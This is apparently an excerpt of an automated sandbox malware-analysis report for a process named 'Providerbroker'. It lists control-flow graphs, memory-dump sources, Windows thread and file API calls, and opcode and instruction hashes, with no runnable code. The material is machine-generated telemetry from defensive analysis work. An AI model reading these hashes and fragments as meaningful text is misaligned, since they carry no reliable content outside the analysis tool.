                                                                                    execution_graph 20377 7ff8490408bb 20378 7ff8490408bf GetFileAttributesW 20377->20378 20380 7ff8490409f5 20378->20380 20373 7ff84903ebc9 20374 7ff84903ebd7 CloseHandle 20373->20374 20376 7ff84903ecb4 20374->20376 20369 7ff84903d1fd 20370 7ff84903d20b SuspendThread 20369->20370 20372 7ff84903d2e4 20370->20372 20381 7ff84903ea60 20382 7ff84903ea6a ResumeThread 20381->20382 20384 7ff84903eb74 20382->20384

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 402 7ff849592b7a-7ff849592b88 403 7ff849592b8e-7ff849592b9f 402->403 404 7ff849592ebf-7ff849592f00 402->404 405 7ff849592ba1-7ff849592ba5 403->405 406 7ff849592bb5-7ff849592bbc 403->406 419 7ff849592f0b-7ff849592fa1 404->419 405->404 407 7ff849592bab-7ff849592bb3 405->407 408 7ff849592b74-7ff849592b78 406->408 409 7ff849592bbe-7ff849592bd4 406->409 407->406 413 7ff849592eb5 408->413 411 7ff849592c64-7ff849592c94 409->411 412 7ff849592bda-7ff849592be2 409->412 425 7ff849592c9a-7ff849592c9b 411->425 426 7ff849592d3e-7ff849592d47 411->426 412->404 416 7ff849592be8-7ff849592bfa 412->416 413->404 416->404 418 7ff849592c00-7ff849592c17 416->418 420 7ff849592c57-7ff849592c5e 418->420 421 7ff849592c19-7ff849592c20 418->421 432 7ff849592f26-7ff849592fa6 419->432 433 7ff849592fac-7ff849592fef 419->433 420->411 420->412 421->404 424 7ff849592c26-7ff849592c54 421->424 424->420 430 7ff849592c9e-7ff849592cb4 425->430 427 7ff849592d4d-7ff849592d53 426->427 428 7ff849592e7f-7ff849592e90 426->428 427->404 434 7ff849592d59-7ff849592d68 427->434 428->413 430->404 431 7ff849592cba-7ff849592cde 430->431 435 7ff849592ce0-7ff849592d03 431->435 436 7ff849592d31-7ff849592d38 431->436 432->433 446 7ff849592f48-7ff849592fa8 432->446 447 7ff849592ff1-7ff849593033 433->447 438 7ff849592e72-7ff849592e79 434->438 439 7ff849592d6e-7ff849592d75 434->439 435->404 448 7ff849592d09-7ff849592d2f 435->448 436->426 436->430 438->427 438->428 439->404 442 7ff849592d7b-7ff849592d85 439->442 450 7ff849592d8c-7ff849592d97 442->450 446->433 456 7ff849592f6c-7ff849592faa 446->456 467 7ff849593035-7ff849593046 call 7ff8495d4828 447->467 468 7ff849593048 447->468 448->435 448->436 452 7ff849592dd6-7ff849592de5 450->452 453 7ff849592d99-7ff849592db0 450->453 452->404 455 7ff849592deb-7ff849592e0f 452->455 453->404 457 7ff849592db6-7ff849592dd2 453->457 458 7ff849592e12-7ff849592e2f 455->458 456->433 469 7ff849592f8d-7ff849592fa0 456->469 457->453 461 7ff849592dd4 457->461 458->404 463 7ff849592e35-7ff849592e50 458->463 462 7ff849592e52-7ff849592e68 461->462 462->404 466 7ff849592e6a-7ff849592e6e 462->466 463->458 463->462 466->438 467->468 471 7ff849593051-7ff8495930f7 468->471 486 7ff849593227-7ff849593244 471->486 487 7ff8495930fd-7ff8495934a0 471->487 489 7ff849593551-7ff8495935b8 486->489 490 7ff84959324a-7ff84959324f 486->490 492 7ff84959350e-7ff849593528 487->492 504 7ff849593728 489->504 491 7ff849593252-7ff849593259 490->491 494 7ff84959325b-7ff84959325f 491->494 495 7ff8495931dc-7ff849593549 491->495 494->447 498 7ff849593265 494->498 495->489 499 7ff8495932e3-7ff8495932e6 498->499 500 7ff8495932e9-7ff8495932f0 499->500 502 7ff8495932f6 500->502 503 7ff849593267-7ff84959329c call 7ff849592ef0 500->503 505 7ff849593366-7ff84959336d 502->505 503->489 510 7ff8495932a2-7ff8495932b2 503->510 504->504 507 7ff8495932f8-7ff84959332a call 7ff849592ef0 505->507 508 7ff84959336f-7ff8495933b5 505->508 507->489 516 7ff849593330-7ff849593358 507->516 523 7ff849593184-7ff849593188 508->523 524 7ff8495933bb-7ff8495933c0 508->524 510->447 513 7ff8495932b8-7ff8495932d5 510->513 513->489 515 7ff8495932db-7ff8495932e0 513->515 515->499 516->489 518 7ff84959335e-7ff849593363 516->518 518->505 525 7ff8495931da 523->525 526 7ff84959318a-7ff8495931a7 523->526 527 7ff849593446-7ff84959344a 524->527 525->491 526->492 528 7ff849593450-7ff849593456 527->528 529 7ff8495933c5-7ff8495933f4 call 7ff849592ef0 527->529 529->489 532 7ff8495933fa-7ff84959340a 529->532 532->471 533 7ff849593410-7ff84959341f 532->533 533->489 534 7ff849593425-7ff849593438 533->534 534->500 535 7ff84959343e-7ff849593443 534->535 535->527
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 38356ca133089c09047060fe26eb67ac46e2036a71cc0d4e994c427f8ca12e94
                                                                                    • Instruction ID: a116971c9e649fa06d7879743143acbf32b35654c2cf3c158781aeaba58c55ec
                                                                                    • Opcode Fuzzy Hash: 38356ca133089c09047060fe26eb67ac46e2036a71cc0d4e994c427f8ca12e94
                                                                                    • Instruction Fuzzy Hash: DD52B23091C6898FEB6DDF18D8D46B877B1FF49344F2441BDD46ACB296CA38A981CB41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dfc55ad788c78ecc64206c5fbce717385831c17e77cf4cd620d76ee8cd22db76
                                                                                    • Instruction ID: 43fe367cde3b416eef9c8c969b97a3c023fe32eae524de0aa0bc7cf35c2f689f
                                                                                    • Opcode Fuzzy Hash: dfc55ad788c78ecc64206c5fbce717385831c17e77cf4cd620d76ee8cd22db76
                                                                                    • Instruction Fuzzy Hash: 67A1CF7191CA899FE788EB6CC8653A9BFF1FB56350F4401BAC009D72D2CB791825CB51

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8^ZI$`6nI
                                                                                    • API String ID: 0-1195450933
                                                                                    • Opcode ID: 13d290b8e1d0a2f092874d3b2cc03efb6a405a89ce49c52802aa78cb65238aa5
                                                                                    • Instruction ID: c829829b72d64b685c78e759a54b8545b70ffcc69317745c04f1eecbbdfdd846
                                                                                    • Opcode Fuzzy Hash: 13d290b8e1d0a2f092874d3b2cc03efb6a405a89ce49c52802aa78cb65238aa5
                                                                                    • Instruction Fuzzy Hash: 4FF10872C4FBE66FE229BF78E8650F57F90EF022A8B1C41B7D0884E093DD1968458659

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PcI$\^H
                                                                                    • API String ID: 0-2189569119
                                                                                    • Opcode ID: 7f9f753078dde4f2bc226cd117d07b53f118a95266280b6eb579f84a9682dfce
                                                                                    • Instruction ID: 00409650ec9bbef7c58f5110047297659e661e6bd89b6b8eb877eed4e61c844d
                                                                                    • Opcode Fuzzy Hash: 7f9f753078dde4f2bc226cd117d07b53f118a95266280b6eb579f84a9682dfce
                                                                                    • Instruction Fuzzy Hash: AEA1B171A0DACA8FE7A5EF28C8546B87BF2FF45344F5941FAD01DC7192DE2898058741

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 169 7ff8490408bb-7ff8490408e3 171 7ff8490408ea-7ff8490409f3 GetFileAttributesW 169->171 172 7ff8490408e5 169->172 177 7ff8490409fb-7ff849040a39 171->177 178 7ff8490409f5 171->178 172->171 178->177
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 318e2c30d055aec3e04a8c675b37b4d1af7f72f39acd1626d209eb71015fb7db
                                                                                    • Instruction ID: 44362dec394179bdd8e5b60a2b17163bbfd42297e3043c1192b1c342f489bd0a
                                                                                    • Opcode Fuzzy Hash: 318e2c30d055aec3e04a8c675b37b4d1af7f72f39acd1626d209eb71015fb7db
                                                                                    • Instruction Fuzzy Hash: 58512C70908A4C8FDF98EF58C899AEDBBF0FB69311F14416ED409E7252DB31A885CB41

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 180 7ff84903cec0-7ff8490408e3 182 7ff8490408ea-7ff8490409f3 GetFileAttributesW 180->182 183 7ff8490408e5 180->183 188 7ff8490409fb-7ff849040a39 182->188 189 7ff8490409f5 182->189 183->182 189->188
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 8b868bcc4fc372e15f464e3510a2d06fdbc85b08a89e579f048275c9eb9d648e
                                                                                    • Instruction ID: 61c3d0c2d2ff0d1629e4209cc8195790d0d9767dbee0042bfcc9c4c0b78b32c8
                                                                                    • Opcode Fuzzy Hash: 8b868bcc4fc372e15f464e3510a2d06fdbc85b08a89e579f048275c9eb9d648e
                                                                                    • Instruction Fuzzy Hash: BF511870908A4C8FDF98EF58D899AEDBBF0FB69311F10416AD409E7251DB31A885CB41

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 191 7ff849040871-7ff84904087a 192 7ff8490408da-7ff8490408e3 191->192 193 7ff84904087c-7ff84904088c 191->193 195 7ff8490408ea-7ff8490409f3 GetFileAttributesW 192->195 196 7ff8490408e5 192->196 193->192 201 7ff8490409fb-7ff849040a39 195->201 202 7ff8490409f5 195->202 196->195 202->201
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5cc095b573654bf92dcf216d61e69a00a06a452f4277a72bce3c10304164b906
                                                                                    • Instruction ID: fafe36dea99cfe34333eb6f90e09e59dcb84f14ea5b35250f82ac10d4bd3194a
                                                                                    • Opcode Fuzzy Hash: 5cc095b573654bf92dcf216d61e69a00a06a452f4277a72bce3c10304164b906
                                                                                    • Instruction Fuzzy Hash: 67513C71908A4C8FDF98EF58D894AEDBBB0FF69310F14416ED049E7252DB35A845CB41

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 204 7ff84903ea60-7ff84903ea99 206 7ff84903ea9b 204->206 207 7ff84903ea9c-7ff84903eb72 ResumeThread 204->207 206->207 211 7ff84903eb7a-7ff84903ebc4 207->211 212 7ff84903eb74 207->212 212->211
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 63e12a4e83e6bec085db4e7101c0b2a288a8c654aa1e7fa9bc3e0817205fc238
                                                                                    • Instruction ID: e93e9449276366416f57eb0da9f33586a965c42854ed173f9c06f3788358fbbc
                                                                                    • Opcode Fuzzy Hash: 63e12a4e83e6bec085db4e7101c0b2a288a8c654aa1e7fa9bc3e0817205fc238
                                                                                    • Instruction Fuzzy Hash: DA517C7090D78C8FDB56DFA8C854AE9BFF0EF56310F0441ABD049D7292DA75A846CB11

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 215 7ff84903d1fd-7ff84903d209 216 7ff84903d20b-7ff84903d213 215->216 217 7ff84903d214-7ff84903d2e2 SuspendThread 215->217 216->217 221 7ff84903d2ea-7ff84903d334 217->221 222 7ff84903d2e4 217->222 222->221
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID: SuspendThread
                                                                                    • String ID:
                                                                                    • API String ID: 3178671153-0
                                                                                    • Opcode ID: 761464269168f31388aae6a1516af96936072ce65c0da02bd3d1c4a578d5b2c1
                                                                                    • Instruction ID: 4706783256438afd21c7c1f04bed14b9c0620eda1368350f401b6431cc92e6b5
                                                                                    • Opcode Fuzzy Hash: 761464269168f31388aae6a1516af96936072ce65c0da02bd3d1c4a578d5b2c1
                                                                                    • Instruction Fuzzy Hash: 89412B70D0864C8FDB99DFA8D885AADBBB0FB5A310F14416AD049E7252DA74A845CB41

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: X;WI
                                                                                    • API String ID: 0-4248420487
                                                                                    • Opcode ID: 6ba6b644ccab60358e0713d3d81313dd73b518be84380a2ae5ac802b19b6e1e0
                                                                                    • Instruction ID: 2863b25f49f7030386bcd4631ec6d756488815c3ce77d5f349bf9631a936d4e7
                                                                                    • Opcode Fuzzy Hash: 6ba6b644ccab60358e0713d3d81313dd73b518be84380a2ae5ac802b19b6e1e0
                                                                                    • Instruction Fuzzy Hash: BF71E230D1D68A9FFB65EF788C546BD7BA0EF55384F2508BAD01EC7182DE286841CB51

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 9f892a38942d3355df35869a7ced8d110297693cf6d73c749f68dbb1fb50fd3f
                                                                                    • Instruction ID: 8345ccea1c9fd74989e237ff44621469635cabdf99d14ce78d8a7a3156183075
                                                                                    • Opcode Fuzzy Hash: 9f892a38942d3355df35869a7ced8d110297693cf6d73c749f68dbb1fb50fd3f
                                                                                    • Instruction Fuzzy Hash: 10517230D0C58A9FEB69EF98C8585FDB7B1FF45344F2541BAC01AE7292CA396905CB50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 312 7ff8495928e8-7ff849592900 314 7ff849592908-7ff849592933 312->314 318 7ff84959295c-7ff849592962 314->318 319 7ff849592969-7ff84959296f 318->319 320 7ff849592971-7ff849592976 319->320 321 7ff849592935-7ff84959294e 319->321 324 7ff849592863-7ff8495928a8 320->324 325 7ff84959297c-7ff8495929b1 320->325 322 7ff849592954-7ff849592959 321->322 323 7ff849592a45-7ff849592a55 321->323 322->318 330 7ff849592a57 323->330 331 7ff849592a58-7ff849592aa6 323->331 324->319 329 7ff8495928ae-7ff8495928b4 324->329 332 7ff849592865-7ff849592a3d 329->332 333 7ff8495928b6 329->333 330->331 332->323 337 7ff8495928df-7ff8495928e6 333->337 337->312 340 7ff8495928b8-7ff8495928d1 337->340 340->323 341 7ff8495928d7-7ff8495928dc 340->341 341->337
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: c6174ed676797a1beadd7897fba3d7044ec3e6b70ce13ad9a9f3918cca6533c2
                                                                                    • Instruction ID: d9893b44a67428d35c0261895ee76881aacf8f84119b1e694f0bf6fdc6fb5b58
                                                                                    • Opcode Fuzzy Hash: c6174ed676797a1beadd7897fba3d7044ec3e6b70ce13ad9a9f3918cca6533c2
                                                                                    • Instruction Fuzzy Hash: 94515F31D0C68A9FEB69EFA8D8545BDB7B1FF58344F2140BAC01AE7282CA746941CB50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 344 7ff84903ebc9-7ff84903ebd5 345 7ff84903ebe0-7ff84903ebe9 344->345 346 7ff84903ebd7-7ff84903ebdf 344->346 347 7ff84903ec1b-7ff84903ecb2 CloseHandle 345->347 348 7ff84903ebeb-7ff84903ec1a 345->348 346->345 352 7ff84903ecba-7ff84903ed0e 347->352 353 7ff84903ecb4 347->353 348->347 353->352
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: baf25c6622c65f48bb16c1a4b4aa3b2e82d1816a7e8c390b1ccb2579a28c6af8
                                                                                    • Instruction ID: 420bb106bc39445afdeb2b573e7dded98a1de6b47a76079aac7795c5cdd213c5
                                                                                    • Opcode Fuzzy Hash: baf25c6622c65f48bb16c1a4b4aa3b2e82d1816a7e8c390b1ccb2579a28c6af8
                                                                                    • Instruction Fuzzy Hash: BE414C30D0865C8FDB59EFA8D889BEDBBF0FB56311F14416AD44DE7292DA349885CB01

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H{lI
                                                                                    • API String ID: 0-3775460832
                                                                                    • Opcode ID: 5ca2e9633ece0c5d0aa323ae08037bad8f42b020b964a3ac27c74f95996a3256
                                                                                    • Instruction ID: 42828ce0f1ba476575503d1ef28a7da00b2e14592beecfba736307700f3f7364
                                                                                    • Opcode Fuzzy Hash: 5ca2e9633ece0c5d0aa323ae08037bad8f42b020b964a3ac27c74f95996a3256
                                                                                    • Instruction Fuzzy Hash: AF415CB1E1C99E9EEBA4EF58C8416FDBBB1FF94355F610035D01ED3295EA3468418B40

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 382 7ff84959cb05-7ff84959cbd3 call 7ff84959b5b0 395 7ff84959cbd9-7ff84959cbdd 382->395
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PcI
                                                                                    • API String ID: 0-2756192865
                                                                                    • Opcode ID: 8537a16d46d07b678e590a12dbc284aebae59994001dbb239c3c1754a516b509
                                                                                    • Instruction ID: 8a6e9acab901009ae903168040488f507b8448b0ed33f30082bf1a0a6cf639bb
                                                                                    • Opcode Fuzzy Hash: 8537a16d46d07b678e590a12dbc284aebae59994001dbb239c3c1754a516b509
                                                                                    • Instruction Fuzzy Hash: DA31AC71D1C98D8FEBA5EF64C8505ECBBB2FF59344F6500AAC00EE7292DA24A804CB10

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 398 7ff848e91e9c-7ff848e91ec4 call 7ff848e90c50 401 7ff848e91ec9 398->401
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: 0f2e91487e03f267337135b2cd771ab139e2324e8c5ce879cd162866382f69ff
                                                                                    • Instruction ID: 81d380ec11ada29e938540b454f0fe55211349737c44c8f63b517ec826274206
                                                                                    • Opcode Fuzzy Hash: 0f2e91487e03f267337135b2cd771ab139e2324e8c5ce879cd162866382f69ff
                                                                                    • Instruction Fuzzy Hash: 41E0EC30D5852F8AEB64EB60C8557FDB2A1EF94344F4181FB802FE2595CF752A809E41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e37841f5cd7e681e0b506e0deb0787de3b2dce6204a0f77308560d7e7ab8f0ba
                                                                                    • Instruction ID: 1bf0311f8cfed7b8db072f945cbcb387a2879ba6bc26d07a2626c3231affad41
                                                                                    • Opcode Fuzzy Hash: e37841f5cd7e681e0b506e0deb0787de3b2dce6204a0f77308560d7e7ab8f0ba
                                                                                    • Instruction Fuzzy Hash: 52329430A1CA598FFBA8EF18D895A7877E2FF54354F2141B9D01EC7292DE24AC45CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c693f4372495c8af45244181a473d03ffab0be5d745ebfa4cc8342a6856bad7
                                                                                    • Instruction ID: 395bad8ae9da1cd0c5d8de97ae3b4bc627e3cc8cb0fdd50ebddc3071c50e3a13
                                                                                    • Opcode Fuzzy Hash: 7c693f4372495c8af45244181a473d03ffab0be5d745ebfa4cc8342a6856bad7
                                                                                    • Instruction Fuzzy Hash: 73227E30D1C5998FEB69EF18C8906B877B5FF54340F6582BDC46AD72C6DA38A981CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c5f8df75c673f6139a57c7b6c0ac633c732f3be75ad81bf124cc32c34abdab02
                                                                                    • Instruction ID: 423ff771e35922a71b4ac226e52f2c3e11818c310e8881b5e1149ceec073cefa
                                                                                    • Opcode Fuzzy Hash: c5f8df75c673f6139a57c7b6c0ac633c732f3be75ad81bf124cc32c34abdab02
                                                                                    • Instruction Fuzzy Hash: 67D1E33090CB86CFE378EF18D89517577E1FF44398B2545BEC46AC36A2DA39B8428781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7dada3a16cf25853faf72ee083de77e1298674e57671b2d552e6af0301e2792a
                                                                                    • Instruction ID: d533f5a64643f3ea8b05f4d8c5ff6942b63b958a62151bcf576751fa4e9c4421
                                                                                    • Opcode Fuzzy Hash: 7dada3a16cf25853faf72ee083de77e1298674e57671b2d552e6af0301e2792a
                                                                                    • Instruction Fuzzy Hash: 9841FB71D4DA9ADFF768BF58A8412F877A0EF04398F29417AD01DC61C3CE2868008B89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5051b49f4e1b451923b799c78badc543acc1d2cfb670412cb797918a7d12073f
                                                                                    • Instruction ID: 3fd9822101227ef7093d359b68bc1159a269846b92d8bf048ecd15dcfbfe02ab
                                                                                    • Opcode Fuzzy Hash: 5051b49f4e1b451923b799c78badc543acc1d2cfb670412cb797918a7d12073f
                                                                                    • Instruction Fuzzy Hash: 89D1D1305186968FFB59DF08C8D46B13BA1FF45304B6546BDD85B8B68BCA38F885CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e958f821688fd5aac1a74725b5046266b6829ae203c7427c0b345f5780530f71
                                                                                    • Instruction ID: e5fa25125db90fd0a33229fddfc94b8c9cffe24610569ff1d6c85fa2792874f5
                                                                                    • Opcode Fuzzy Hash: e958f821688fd5aac1a74725b5046266b6829ae203c7427c0b345f5780530f71
                                                                                    • Instruction Fuzzy Hash: 1DC10330A0CA868FF759EF18D8986B1B7A1FF49344F254179C05EC7A86CB28F855CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3c2e545528580ca044c50800af8a8f4013aab43c3413bf3c6a159c3f8c283cb8
                                                                                    • Instruction ID: bf5523af300a477f84aa3131e77ee2fa204dfd11aa7ede45f96b8e9c553ed661
                                                                                    • Opcode Fuzzy Hash: 3c2e545528580ca044c50800af8a8f4013aab43c3413bf3c6a159c3f8c283cb8
                                                                                    • Instruction Fuzzy Hash: 4FB1F53090DA868FE759EF28E8906B4B7A1FF58344F654179C05EC7A86DF28B851CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
